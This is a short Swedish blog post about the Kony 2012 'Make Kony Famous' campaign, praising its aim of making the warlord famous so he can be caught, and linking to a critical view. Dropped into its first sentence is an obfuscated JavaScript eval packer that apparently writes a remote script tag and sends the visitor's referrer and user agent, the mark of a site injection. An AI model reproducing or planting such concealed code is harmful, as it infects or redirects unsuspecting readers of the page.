Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

En helt otrolig kampanj: Make Kony Famous

En helt otrolig kampanj: Make Kony Famous
Sebastian

Detta eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bnrhy|var|u0026u|referrer|ehknr||js|php’.split(’|’),0,{}))
är kanske en av världens största och intressantaste demostraton någonsin. Demostration kanske är fel utryck men jag vet inte riktigt vad jag ska kalla det.

Konceptet går ut på att bygga upp en kändis status åt en farlig afrikansk krigsherre som är känd för att ha mördat fler tusen personer. Hans namn är Kony.

Denna krigsherre är i nuläget svår att få tag i. Detta beror på att ingen känner till honom, han är en osynlig person. Genom att bygga upp intresset och en känd bild kommer fler att gå med i kampen, och det kommer bli mycket lättare att fånga honom. Media kommer börja skriva och regeringar reagera, något som är otroligt viktigt för att lyckas.

För att första det riktigt otroliga konceptet måste ni se videon ovan, ni kommer inte ångra er.

 

En annan vinkel: Kony 2012: Är det en kamp om rättvisa, eller bevittnar vi ett världsomspännande bedrägeri? läs mer här